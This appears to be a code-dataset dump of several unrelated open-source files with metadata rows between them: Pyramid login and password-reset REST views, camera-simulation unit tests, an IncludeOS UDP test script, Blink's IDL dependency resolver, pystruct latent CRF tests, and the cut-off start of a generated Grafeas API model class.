leak information (indicating that a not-yet-activated account already
exists).
"""
user = request.validated.get('user', None)
if user is None or request.errors:
return
if not user.active:
error = error_entry('body', 'name', 'User account not yet activated')
request.errors.append(error)
@view_defaults(
renderer='json',
context=IRootPool,
name='login_username',
)
class LoginUsernameView(RESTView):
"""Log in a user via their name."""
validation_POST = (POSTLoginUsernameRequestSchema,
[validate_login_name,
validate_login_password,
validate_account_active])
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Return options for view."""
return super().options()
@view_config(request_method='POST',
accept='application/json')
def post(self) -> dict:
"""Create new resource and get response data."""
return _login_user(self.request)
def _login_user(request: Request) -> dict:
"""Log-in a user and return a response indicating success."""
user = request.validated['user']
userid = resource_path(user)
headers = remember(request, userid) or {}
user_path = headers['X-User-Path']
user_token = headers['X-User-Token']
return {'status': 'success',
'user_path': user_path,
'user_token': user_token}
@view_defaults(
renderer='json',
context=IRootPool,
name='login_email',
)
class LoginEmailView(RESTView):
"""Log in a user via their email address."""
validation_POST = (POSTLoginEmailRequestSchema,
[validate_login_email,
validate_login_password,
validate_account_active])
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Return options for view."""
return super().options()
@view_config(request_method='POST',
accept='application/json')
def post(self) -> dict:
"""Create new resource and get response data."""
return _login_user(self.request)
def validate_activation_path(context, request: Request):
"""Validate the user name of a login request.
If valid and activated, the user object is added as 'user' to
`request.validated`.
"""
path = request.validated['path']
locator = request.registry.getMultiAdapter((context, request),
IUserLocator)
user = locator.get_user_by_activation_path(path)
error = error_entry('body', 'path', 'Unknown or expired activation path')
if user is None:
request.errors.append(error)
elif is_older_than(user, days=8):
request.errors.append(error)
user.activation_path = None
else:
user.activate()
user.activation_path = None
request.validated['user'] = user
event = ResourceSheetModified(user, IUserBasic, request.registry, {},
{}, request)
request.registry.notify(event) # trigger reindex activation_path index
@view_defaults(
renderer='json',
context=IRootPool,
name='activate_account',
)
class ActivateAccountView(RESTView):
"""Log in a user via their name."""
validation_POST = (POSTActivateAccountViewRequestSchema,
[validate_activation_path])
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Return options for view."""
return super().options()
@view_config(request_method='POST',
accept='application/json')
def post(self) -> dict:
"""Activate a user account and log the user in."""
return _login_user(self.request)
@view_defaults(
renderer='string',
context=IRootPool,
name='report_abuse',
)
class ReportAbuseView(RESTView):
"""Receive and process an abuse complaint."""
validation_POST = (POSTReportAbuseViewRequestSchema, [])
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Return options for view."""
return super().options()
@view_config(request_method='POST',
accept='application/json')
def post(self) -> dict:
"""Receive and process an abuse complaint."""
messenger = self.request.registry.messenger
messenger.send_abuse_complaint(url=self.request.validated['url'],
remark=self.request.validated['remark'],
user=get_user(self.request))
return ''
@view_defaults(
renderer='json',
context=IRootPool,
name='message_user',
)
class MessageUserView(RESTView):
"""Send a message to another user."""
validation_POST = (POSTMessageUserViewRequestSchema, [])
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Return options for view."""
result = {}
if self.request.has_permission('message_to_user', self.context):
schema = POSTMessageUserViewRequestSchema().bind(
context=self.context)
result['POST'] = {'request_body': schema.serialize({}),
'response_body': ''}
return result
@view_config(request_method='POST',
permission='message_to_user',
accept='application/json')
def post(self) -> dict:
"""Send a message to another user."""
messenger = self.request.registry.messenger
data = self.request.validated
messenger.send_message_to_user(recipient=data['recipient'],
title=data['title'],
text=data['text'],
from_user=get_user(self.request))
return ''
@view_defaults(
renderer='json',
context=IRootPool,
name='create_password_reset',
)
class CreatePasswordResetView(RESTView):
"""Create a password reset resource."""
validation_POST = (POSTCreatePasswordResetRequestSchema, [])
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Return options for view."""
return {'POST': {}}
@view_config(request_method='POST',
accept='application/json'
)
def post(self) -> dict:
"""Create as password reset resource."""
resets = find_service(self.context, 'principals', 'resets')
user = self.request.validated['user']
self.request.registry.content.create(IPasswordReset.__identifier__,
resets,
creator=user)
return {'status': 'success'}
@view_defaults(
renderer='json',
context=IRootPool,
name='password_reset',
)
class PasswordResetView(RESTView):
"""Reset a user password."""
validation_POST = (POSTPasswordResetRequestSchema, [])
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Return options for view."""
return {'POST': {}}
@view_config(request_method='POST',
accept='application/json',
)
def post(self) -> dict:
"""Reset password."""
reset = self.request.validated['path']
password = self.request.validated['password']
reset.reset_password(password)
return _login_user(self.request)
def includeme(config):
"""Register Views."""
config.scan('.views')
| agpl-3.0 | -7,723,900,045,183,047,000 | 36.055777 | 79 | 0.607053 | false |
EMVA1288/emva1288 | emva1288/unittests/test_camera.py | 1 | 7638 | import unittest
from emva1288.camera.camera import Camera
import numpy as np
from emva1288.camera import routines
class CameraTestCase(unittest.TestCase):
def setUp(self):
self.cam = Camera()
def tearDown(self):
del self.cam
def test_img(self):
img = self.cam.grab(0)
self.assertEqual((self.cam.height, self.cam.width), np.shape(img))
def test_radiance(self):
img1 = self.cam.grab(0)
img2 = self.cam.grab(self.cam.get_radiance_for(mean=250))
self.assertLess(img1.mean(), img2.mean())
class CameraTestBayer(unittest.TestCase):
def test_bayer_layer(self):
# Init the parameters
h, w = [480, 640]
wavelength = np.linspace(400, 800, 100)
transmission_red = 670
transmission_blue = 450
transmission_green = 550
b_layer = routines.get_bayer_filter(transmission_green,
transmission_red,
transmission_blue,
transmission_green,
w, h, wavelength)
qe = routines.Qe(filter=b_layer)
cam = Camera(width=w, height=h, qe=qe)
# Initiata a cam without a bayer filter
cam_d = Camera(width=w, height=h)
# Set the camera for testing the layer
target = cam.img_max / 2
# Get the radiance to grab from the second cam. The output radiance
# is affected by qe, so the bayer_filter as well
radiance = cam_d.get_radiance_for(mean=target)
img = cam.grab(radiance)
green_filter = np.tile([[0, 1], [1, 0]], (int(h/2), int(w/2)))
blue_filter = np.tile([[1, 0], [1, 1]], (int(h/2), int(w/2)))
red_filter = np.tile([[1, 1], [0, 1]], (int(h/2), int(w/2)))
gf = b_layer[0, 0, :].mean()
rf = b_layer[0, 1, :].mean()
bf = b_layer[1, 0, :].mean()
# Test if the mean of the green it's 100% of the target +/- 5
self.assertAlmostEqual(np.ma.masked_array(
img,
mask=green_filter).mean(),
target * gf, delta=10,
msg="green not in range")
# Test if the mean of the red it's 15% of the target +/- 5
self.assertAlmostEqual(np.ma.masked_array(
img,
mask=red_filter).mean(),
target * rf, delta=10,
msg="red not in range")
# Test if the mean of the blue it's 2% of the target +/- 5
self.assertAlmostEqual(np.ma.masked_array(
img,
mask=blue_filter).mean(),
target * bf, delta=10,
msg="blue not in range")
class CameraTestPrnuDsnu(unittest.TestCase):
def test_prnu(self):
# Init the parameters
h, w = [480, 640]
rep = 200
value8 = 3
# create the pattern of the prnu
prnu_array = np.ones((8))
prnu_array[-1] = value8
prnu = routines.get_tile(prnu_array, h, w)
# Set the camera for testing the prnu
cam = Camera(width=w, height=h, prnu=prnu)
var = np.sqrt(cam._sigma2_dark_0)
target = cam.img_max / 2
# The target (top_target) is the multiplication of the target
# (what we expect without prnu) and the value8(prnu). We can do it
# because if we look at the _u_e function in emva1288.camera.camera
# the prnu affect the QE with a multiplication. So if we just
# multiplied the target by the prnu it's the same thing.
# But this value can go over the maximal value for one pixel, this
# is why we use the min() function to take the maximal value than the
# camera can take.
top_target = min(target * value8, cam.img_max)
radiance = cam.get_radiance_for(mean=target)
img = cam.grab(radiance)
# create the mask
prnu_mask = np.zeros((8))
prnu_mask[-1] = 1
prnu_mask_resize = routines.get_tile(prnu_mask, h, w)
prnu_non_mask = np.ones((8))
prnu_non_mask[-1] = 0
prnu_non_mask_resize = routines.get_tile(prnu_non_mask, h, w)
# Test if the mean it's 100% of the target +/- variance
self.assertAlmostEqual(np.ma.masked_array(
img,
mask=prnu_mask_resize).mean(),
target, delta=var,
msg="values are not in range")
# Test if the mean of the 8th value it's value8
# multiplied be the target +/- variance
self.assertAlmostEqual(np.ma.masked_array(
img,
mask=prnu_non_mask_resize).mean(),
top_target, delta=var,
msg="8th value it's not in range")
def test_dsnu(self):
# Init the parameters
h, w = [480, 640]
value8 = 5
rep = 200
# create the pattern of the dsnu
dsnu_array = np.ones((8))
dsnu_array[-1] = value8
dsnu = routines.get_tile(dsnu_array, h, w)
# Set the camera for testing the dsnu
cam = Camera(width=w, height=h, dsnu=dsnu)
var = np.sqrt(cam._sigma2_dark_0)
# The target is the number of electrons who are not affected
# by the dsnu. To resume, we suppose to observe is a combinaison of
# electrons from the dark signal and the temperature. The total need
# to be multiplied by the gain of the system (K).
# for more eplination see the grab function in emva1288.camera.camera
target = cam.K * (cam._dark_signal_0 + cam._u_therm())
# Here the target (top_target) is the part who is affected by
# the dsnu. Physicaly, the same phenomen append but this time the
# dark signal is NonUniform so thw value who represent the dsnu is
# added to the dark signal befor the multiplication of the gain.
top_target = cam.K * (cam._dark_signal_0 + cam._u_therm() + value8)
img = cam.grab(0)
# create the mask
dsnu_mask = np.zeros((8))
dsnu_mask[-1] = 1
dsnu_mask_resize = routines.get_tile(dsnu_mask, h, w)
dsnu_non_mask = np.ones((8))
dsnu_non_mask[-1] = 0
dsnu_non_mask_resize = routines.get_tile(dsnu_non_mask, h, w)
# Test if the mean it's 100% of the target +/- variance
self.assertAlmostEqual(np.ma.masked_array(
img,
mask=dsnu_mask_resize).mean(),
target, delta=var,
msg="values are not in range")
# Test if the mean of the 8th value it's value8
# multiplied be the target +/- variance
self.assertAlmostEqual(np.ma.masked_array(
img,
mask=dsnu_non_mask_resize).mean(),
top_target, delta=var,
msg="8th value it's not in range")
class CameraTestRoutines(unittest.TestCase):
def test_get_tile(self):
# TEST 1D
# Init the parameters
h, w = [1, 24]
dim1 = np.zeros((8))
# Supposed Results
res_array = routines.get_tile(dim1, h, w)
res_dim1 = np.zeros((24))
# Test to see if the layer come right
# shape[0] will give us the number in (width,)
self.assertEqual(w, res_array.shape[0])
self.assertEqual(res_dim1.tolist(), res_array.tolist())
# TEST 2D
# Init the parameters
h, w = [5, 7]
dim2 = np.zeros((3))
# Supposed Results
res_array = routines.get_tile(dim2, h, w)
res_dim2 = np.zeros((5, 7))
# Test to see if the layer come right
self.assertEqual((h, w), res_array.shape)
self.assertEqual(res_dim2.tolist(), res_array.tolist())
| gpl-3.0 | -3,343,370,386,381,614,600 | 39.2 | 77 | 0.56651 | false |
AndreasAakesson/IncludeOS | test/net/integration/udp/test.py | 1 | 3159 | #! /usr/bin/env python
from __future__ import print_function
from builtins import str
import sys
import os
from vmrunner import vmrunner
import socket
# Get an auto-created VM from the vmrunner
vm = vmrunner.vms[0]
def UDP_test():
print("<Test.py> Performing UDP tests")
HOST, PORT = "10.0.0.55", 4242
sock = socket.socket
# SOCK_DGRAM is the socket type to use for UDP sockets
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# NOTE: This is necessary for the test to exit after the VM has
# been shut down due to a VM timeout
sock.settimeout(20)
data = "Lucky".encode()
sock.sendto(data, (HOST, PORT))
received = sock.recv(1024)
print("<Test.py> Sent: {}".format(data))
print("<Test.py> Received: {}".format(received))
if received != data: return False
data = "Luke".encode()
sock.sendto(data, (HOST, PORT))
received = sock.recv(1024)
print("<Test.py> Sent: {}".format(data))
print("<Test.py> Received: {}".format(received))
if received != data: return False
data = "x".encode() * 1472
sock.sendto(data, (HOST, PORT))
received = sock.recv(1500)
if received != data:
print("<Test.py> Did not receive long string: {}".format(received))
return False
data = "x".encode() * 9216 # 9216 is apparently default max for MacOS
sock.sendto(data, (HOST, PORT))
received = bytearray()
while (len(received) < len(data)):
received.extend(sock.recv(len(data)))
print("RECEIVED: ", len(received))
if received != data:
print("<Test.py> Did not receive mega string (64k)")
return False
vm.exit(0, "Test completed without errors")
def UDP6_test(trigger_line):
print("<Test.py> Performing UDP6 tests")
HOST, PORT = 'fe80::4242%bridge43', 4242
sock = socket.socket
# SOCK_DGRAM is the socket type to use for UDP sockets
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
res = socket.getaddrinfo(HOST, PORT, socket.AF_INET6, socket.SOCK_DGRAM)
af, socktype, proto, canonname, addr = res[0]
# NOTE: This is necessary for the test to exit after the VM has
# been shut down due to a VM timeout
sock.settimeout(20)
data = "Lucky".encode()
sock.sendto(data, addr)
received = sock.recv(1024)
print("<Test.py> Sent: {}".format(data))
print("<Test.py> Received: {}".format(received))
if received != data: return False
data = "Luke".encode()
sock.sendto(data, addr)
received = sock.recv(1024)
print("<Test.py> Sent: {}".format(data))
print("<Test.py> Received: {}".format(received))
if received != data: return False
data = "x".encode() * 1448
sock.sendto(data, addr)
received = sock.recv(1500)
if received != data:
print("<Test.py> Did not receive long string: {}".format(received))
return False
UDP_test()
# Add custom event-handler
vm.on_output("UDP test service", UDP6_test)
if len(sys.argv) > 1:
vm.boot(image_name=str(sys.argv[1]))
else:
# Boot the VM, taking a timeout as parameter
vm.cmake().boot(30,image_name="net_udp").clean()
| apache-2.0 | 3,446,164,124,464,594,400 | 28.801887 | 74 | 0.666667 | false |
kurli/blink-crosswalk | Source/bindings/scripts/interface_dependency_resolver.py | 1 | 15639 | # Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Resolve interface dependencies, producing a merged IdlDefinitions object.
This library computes interface dependencies (partial interfaces and
implements), reads the dependency files, and merges them to the IdlDefinitions
for the main IDL file, producing an IdlDefinitions object representing the
entire interface.
Design doc: http://www.chromium.org/developers/design-documents/idl-compiler#TOC-Dependency-resolution
"""
import os.path
from utilities import idl_filename_to_component, is_valid_component_dependency
# The following extended attributes can be applied to a dependency interface,
# and are then applied to the individual members when merging.
# Note that this moves the extended attribute from the interface to the member,
# which changes the semantics and yields different code than the same extended
# attribute on the main interface.
DEPENDENCY_EXTENDED_ATTRIBUTES = frozenset([
'Conditional',
'PerContextEnabled',
'RuntimeEnabled',
'TypeChecking',
])
class InterfaceDependencyResolver(object):
def __init__(self, interfaces_info, reader):
"""Initialize dependency resolver.
Args:
interfaces_info:
dict of interfaces information, from compute_dependencies.py
reader:
IdlReader, used for reading dependency files
"""
self.interfaces_info = interfaces_info
self.reader = reader
def resolve_dependencies(self, definitions, component):
"""Resolve dependencies, merging them into IDL definitions of main file.
Dependencies consist of 'partial interface' for the same interface as
in the main file, and other interfaces that this interface 'implements'.
These are merged into the main IdlInterface, as the main IdlInterface
implements all these members.
Referenced interfaces are added to IdlDefinitions, but not merged into
the main IdlInterface, as these are only referenced (their members are
introspected, but not implemented in this interface).
Inherited extended attributes are also added to the main IdlInterface.
Modifies definitions in place by adding parsed dependencies.
Args:
definitions: IdlDefinitions object, modified in place
component:
string, describing where the above definitions are defined,
'core' or 'modules'. See KNOWN_COMPONENTS in utilities.py
Returns:
A dictionary whose key is component and value is IdlDefinitions
object whose dependency is resolved.
Raises:
Exception:
A given IdlDefinitions object doesn't have any interfaces,
or a given IdlDefinitions object has incorrect referenced
interfaces.
"""
# FIXME: we need to resolve dependency when we implement partial
# dictionary.
if not definitions.interfaces:
raise Exception('No need to resolve any dependencies of '
'this definition: %s, because this should '
'have a dictionary.' % definitions.idl_name)
target_interface = next(definitions.interfaces.itervalues())
interface_name = target_interface.name
interface_info = self.interfaces_info[interface_name]
if 'inherited_extended_attributes' in interface_info:
target_interface.extended_attributes.update(
interface_info['inherited_extended_attributes'])
resolved_definitions = merge_interface_dependencies(
definitions,
component,
target_interface,
interface_info['dependencies_full_paths'] +
interface_info['dependencies_other_component_full_paths'],
self.reader)
for referenced_interface_name in interface_info['referenced_interfaces']:
referenced_definitions = self.reader.read_idl_definitions(
self.interfaces_info[referenced_interface_name]['full_path'])
for referenced_component in referenced_definitions:
if not is_valid_component_dependency(component, referenced_component):
raise Exception('This definitions: %s is defined in %s '
'but reference interface:%s is defined '
'in %s' % (definitions.idl_name,
component,
referenced_interface_name,
referenced_component))
resolved_definitions[component].update(referenced_definitions[component])
return resolved_definitions
def merge_interface_dependencies(definitions, component, target_interface, dependency_idl_filenames, reader):
"""Merge dependencies ('partial interface' and 'implements') in dependency_idl_filenames into target_interface.
Args:
definitions: IdlDefinitions object, modified in place
component:
string, describing where the above definitions are defined,
'core' or 'modules'. See KNOWN_COMPONENTS in utilities.py
target_interface: IdlInterface object, modified in place
dependency_idl_filenames:
Idl filenames which depend on the above definitions.
reader: IdlReader object.
Returns:
A dictionary whose key is component and value is IdlDefinitions
object whose dependency is resolved.
"""
resolved_definitions = {component: definitions}
# Sort so order consistent, so can compare output from run to run.
for dependency_idl_filename in sorted(dependency_idl_filenames):
dependency_definitions = reader.read_idl_file(dependency_idl_filename)
dependency_component = idl_filename_to_component(dependency_idl_filename)
dependency_interface = next(dependency_definitions.interfaces.itervalues())
dependency_interface_basename, _ = os.path.splitext(os.path.basename(dependency_idl_filename))
transfer_extended_attributes(dependency_interface,
dependency_interface_basename)
# We need to use different checkdeps here for partial interface and
# inheritance.
if dependency_interface.is_partial:
# Case: dependency_interface is a partial interface of
# target_interface.
# So,
# - A partial interface defined in modules can update
# the original interface defined in core.
# However,
# - A partial interface defined in core cannot update
# the original interface defined in modules.
if not is_valid_component_dependency(dependency_component, component):
raise Exception('The partial interface:%s in %s cannot update '
'the original interface:%s in %s' % (dependency_interface.name,
dependency_component,
target_interface.name,
component))
if dependency_component in resolved_definitions:
# When merging a new partial interfaces, should not overwrite
# ImpelemntedAs extended attributes in merged partial
# interface.
# See also the below "if 'ImplementedAs' not in ... " line's
# comment.
dependency_interface.extended_attributes.pop('ImplementedAs', None)
resolved_definitions[dependency_component].update(dependency_definitions)
continue
dependency_interface.extended_attributes.update(target_interface.extended_attributes)
assert target_interface == definitions.interfaces[dependency_interface.name]
# A partial interface should use its original interface's
# ImplementedAs. If the original interface doesn't have,
# remove ImplementedAs defined in the partial interface.
# Because partial interface needs the original interface's
# cpp class to obtain partial interface's cpp class.
# e.g.. V8WindowPartial.cpp:
# DOMWindow* impl = V8Window::toImpl(holder);
# RawPtr<...> cppValue(DOMWindowQuota::webkitStorageInfo(impl));
# TODO(tasak): remove ImplementedAs extended attributes
# from all partial interfaces. Instead, rename all cpp/header
# files correctly. ImplementedAs should not be allowed in
# partial interfaces.
if 'ImplementedAs' not in target_interface.extended_attributes:
dependency_interface.extended_attributes.pop('ImplementedAs', None)
dependency_interface.original_interface = target_interface
target_interface.partial_interfaces.append(dependency_interface)
resolved_definitions[dependency_component] = dependency_definitions
else:
# Case: target_interface implements dependency_interface.
# So,
# - An interface defined in modules can implement some interface
# defined in core.
# In this case, we need "NoInterfaceObject" extended attribute.
# However,
# - An interface defined in core cannot implement any interface
# defined in modules.
if not is_valid_component_dependency(component, dependency_component):
raise Exception('The interface:%s in %s cannot implement '
'the interface:%s in %s.' % (dependency_interface.name,
dependency_component,
target_interface.name,
component))
if component != dependency_component and 'NoInterfaceObject' not in dependency_interface.extended_attributes:
raise Exception('The interface:%s in %s cannot implement '
'the interface:%s in %s because of '
'missing NoInterfaceObject.' % (dependency_interface.name,
dependency_component,
target_interface.name,
component))
resolved_definitions[component].update(dependency_definitions) # merges partial interfaces
# Implemented interfaces (non-partial dependencies) are also merged
# into the target interface, so Code Generator can just iterate
# over one list (and not need to handle 'implements' itself).
target_interface.merge(dependency_interface)
return resolved_definitions
def transfer_extended_attributes(dependency_interface, dependency_interface_basename):
"""Transfer extended attributes from dependency interface onto members.
Merging consists of storing certain interface-level data in extended
attributes of the *members* (because there is no separate dependency
interface post-merging).
The data storing consists of:
* applying certain extended attributes from the dependency interface
to its members
* storing the C++ class of the implementation in an internal
extended attribute of each member, [PartialInterfaceImplementedAs]
No return: modifies dependency_interface in place.
"""
merged_extended_attributes = dict(
(key, value)
for key, value in dependency_interface.extended_attributes.iteritems()
if key in DEPENDENCY_EXTENDED_ATTRIBUTES)
# A partial interface's members are implemented as static member functions
# in a separate C++ class. This class name is stored in
# [PartialInterfaceImplementedAs] which defaults to the basename of
# dependency IDL file.
# This class name can be overridden by [ImplementedAs] on the partial
# interface definition.
#
# Note that implemented interfaces do *not* need [ImplementedAs], since
# they are implemented on the C++ object |impl| itself, just like members of
# the main interface definition, so the bindings do not need to know in
# which class implemented interfaces are implemented.
#
# Currently [LegacyTreatAsPartialInterface] can be used to have partial
# interface behavior on implemented interfaces, but this is being removed
# as legacy cruft:
# FIXME: Remove [LegacyTreatAsPartialInterface]
# http://crbug.com/360435
#
# Note that [ImplementedAs] is used with different meanings on interfaces
# and members:
# for Blink class name and function name (or constant name), respectively.
# Thus we do not want to copy this from the interface to the member, but
# instead extract it and handle it separately.
if (dependency_interface.is_partial or
'LegacyTreatAsPartialInterface' in dependency_interface.extended_attributes):
merged_extended_attributes['PartialInterfaceImplementedAs'] = (
dependency_interface.extended_attributes.get(
'ImplementedAs', dependency_interface_basename))
def update_attributes(attributes, extras):
for key, value in extras.items():
if key not in attributes:
attributes[key] = value
for attribute in dependency_interface.attributes:
update_attributes(attribute.extended_attributes, merged_extended_attributes)
for constant in dependency_interface.constants:
update_attributes(constant.extended_attributes, merged_extended_attributes)
for operation in dependency_interface.operations:
update_attributes(operation.extended_attributes, merged_extended_attributes)
| bsd-3-clause | -6,499,466,371,629,865,000 | 49.775974 | 121 | 0.655988 | false |
pystruct/pystruct | pystruct/tests/test_learners/test_latent_node_crf_learning.py | 1 | 7044 | import itertools
import numpy as np
from numpy.testing import assert_array_equal, assert_array_almost_equal
from nose.tools import assert_equal, assert_true
from pystruct.models import GraphCRF, LatentNodeCRF, EdgeFeatureLatentNodeCRF
from pystruct.learners import (NSlackSSVM, LatentSSVM,
SubgradientLatentSSVM, OneSlackSSVM,
SubgradientSSVM)
from pystruct.datasets import generate_blocks, make_simple_2x2
from pystruct.utils import make_grid_edges
def make_edges_2x2():
edges = []
node_indices = np.arange(4 * 4).reshape(4, 4)
for i, (x, y) in enumerate(itertools.product([0, 2], repeat=2)):
for j in range(x, x + 2):
for k in range(y, y + 2):
edges.append([i + 4 * 4, node_indices[j, k]])
return edges
def test_binary_blocks_cutting_plane_latent_node():
# testing cutting plane ssvm on easy binary dataset
# we use the LatentNodeCRF without latent nodes and check that it does the
# same as GraphCRF
X, Y = generate_blocks(n_samples=3)
crf = GraphCRF()
clf = NSlackSSVM(model=crf, max_iter=20, C=100, check_constraints=True,
break_on_bad=False, n_jobs=1)
x1, x2, x3 = X
y1, y2, y3 = Y
n_states = len(np.unique(Y))
# delete some rows to make it more fun
x1, y1 = x1[:, :-1], y1[:, :-1]
x2, y2 = x2[:-1], y2[:-1]
# generate graphs
X_ = [x1, x2, x3]
G = [make_grid_edges(x) for x in X_]
# reshape / flatten x and y
X_ = [x.reshape(-1, n_states) for x in X_]
Y = [y.ravel() for y in [y1, y2, y3]]
X = list(zip(X_, G))
clf.fit(X, Y)
Y_pred = clf.predict(X)
for y, y_pred in zip(Y, Y_pred):
assert_array_equal(y, y_pred)
latent_crf = LatentNodeCRF(n_labels=2, n_hidden_states=0)
latent_svm = LatentSSVM(NSlackSSVM(model=latent_crf, max_iter=20, C=100,
check_constraints=True,
break_on_bad=False, n_jobs=1),
latent_iter=3)
X_latent = list(zip(X_, G, np.zeros(len(X_), dtype=np.int)))
latent_svm.fit(X_latent, Y, H_init=Y)
Y_pred = latent_svm.predict(X_latent)
for y, y_pred in zip(Y, Y_pred):
assert_array_equal(y, y_pred)
assert_array_almost_equal(latent_svm.w, clf.w)
def test_latent_node_boxes_standard_latent():
# learn the "easy" 2x2 boxes dataset.
# a 2x2 box is placed randomly in a 4x4 grid
# we add a latent variable for each 2x2 patch
# that should make the model fairly simple
X, Y = make_simple_2x2(seed=1, n_samples=40)
latent_crf = LatentNodeCRF(n_labels=2, n_hidden_states=2, n_features=1)
one_slack = OneSlackSSVM(latent_crf)
n_slack = NSlackSSVM(latent_crf)
subgradient = SubgradientSSVM(latent_crf, max_iter=100)
for base_svm in [one_slack, n_slack, subgradient]:
base_svm.C = 10
latent_svm = LatentSSVM(base_svm,
latent_iter=10)
G = [make_grid_edges(x) for x in X]
# make edges for hidden states:
edges = make_edges_2x2()
G = [np.vstack([make_grid_edges(x), edges]) for x in X]
# reshape / flatten x and y
X_flat = [x.reshape(-1, 1) for x in X]
Y_flat = [y.ravel() for y in Y]
X_ = list(zip(X_flat, G, [2 * 2 for x in X_flat]))
latent_svm.fit(X_[:20], Y_flat[:20])
assert_array_equal(latent_svm.predict(X_[:20]), Y_flat[:20])
assert_equal(latent_svm.score(X_[:20], Y_flat[:20]), 1)
# test that score is not always 1
assert_true(.98 < latent_svm.score(X_[20:], Y_flat[20:]) < 1)
def test_latent_node_boxes_latent_subgradient():
# same as above, now with elementary subgradients
X, Y = make_simple_2x2(seed=1)
latent_crf = LatentNodeCRF(n_labels=2, n_hidden_states=2, n_features=1)
latent_svm = SubgradientLatentSSVM(model=latent_crf, max_iter=50, C=10)
G = [make_grid_edges(x) for x in X]
edges = make_edges_2x2()
G = [np.vstack([make_grid_edges(x), edges]) for x in X]
# reshape / flatten x and y
X_flat = [x.reshape(-1, 1) for x in X]
Y_flat = [y.ravel() for y in Y]
X_ = list(zip(X_flat, G, [4 * 4 for x in X_flat]))
latent_svm.fit(X_, Y_flat)
assert_equal(latent_svm.score(X_, Y_flat), 1)
def test_latent_node_boxes_standard_latent_features():
# learn the "easy" 2x2 boxes dataset.
# we make it even easier now by adding features that encode the correct
# latent state. This basically tests that the features are actually used
X, Y = make_simple_2x2(seed=1, n_samples=20, n_flips=6)
latent_crf = LatentNodeCRF(n_labels=2, n_hidden_states=2, n_features=1,
latent_node_features=True)
one_slack = OneSlackSSVM(latent_crf)
n_slack = NSlackSSVM(latent_crf)
subgradient = SubgradientSSVM(latent_crf, max_iter=100)
for base_svm in [one_slack, n_slack, subgradient]:
base_svm.C = 10
latent_svm = LatentSSVM(base_svm,
latent_iter=10)
G = [make_grid_edges(x) for x in X]
# make edges for hidden states:
edges = make_edges_2x2()
G = [np.vstack([make_grid_edges(x), edges]) for x in X]
# reshape / flatten x and y
X_flat = [x.reshape(-1, 1) for x in X]
# augment X with the features for hidden units
X_flat = [np.vstack([x, y[::2, ::2].reshape(-1, 1)])
for x, y in zip(X_flat, Y)]
Y_flat = [y.ravel() for y in Y]
X_ = list(zip(X_flat, G, [2 * 2 for x in X_flat]))
latent_svm.fit(X_[:10], Y_flat[:10])
assert_array_equal(latent_svm.predict(X_[:10]), Y_flat[:10])
assert_equal(latent_svm.score(X_[:10], Y_flat[:10]), 1)
# we actually become prefect ^^
assert_true(.98 < latent_svm.score(X_[10:], Y_flat[10:]) <= 1)
def test_latent_node_boxes_edge_features():
# learn the "easy" 2x2 boxes dataset.
# smoketest using a single constant edge feature
X, Y = make_simple_2x2(seed=1, n_samples=40)
latent_crf = EdgeFeatureLatentNodeCRF(n_labels=2, n_hidden_states=2, n_features=1)
base_svm = OneSlackSSVM(latent_crf)
base_svm.C = 10
latent_svm = LatentSSVM(base_svm,
latent_iter=10)
G = [make_grid_edges(x) for x in X]
# make edges for hidden states:
edges = make_edges_2x2()
G = [np.vstack([make_grid_edges(x), edges]) for x in X]
# reshape / flatten x and y
X_flat = [x.reshape(-1, 1) for x in X]
Y_flat = [y.ravel() for y in Y]
#X_ = zip(X_flat, G, [2 * 2 for x in X_flat])
# add edge features
X_ = [(x, g, np.ones((len(g), 1)), 4) for x, g in zip(X_flat, G)]
latent_svm.fit(X_[:20], Y_flat[:20])
assert_array_equal(latent_svm.predict(X_[:20]), Y_flat[:20])
assert_equal(latent_svm.score(X_[:20], Y_flat[:20]), 1)
# test that score is not always 1
assert_true(.98 < latent_svm.score(X_[20:], Y_flat[20:]) < 1)
| bsd-2-clause | -7,646,659,545,827,525,000 | 34.756345 | 86 | 0.590148 | false |
grafeas/client-python | grafeas/models/api_vulnerability_type.py | 1 | 5261 | # coding: utf-8
"""
An API to insert and retrieve metadata on cloud artifacts.
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v1alpha1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class ApiVulnerabilityType(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
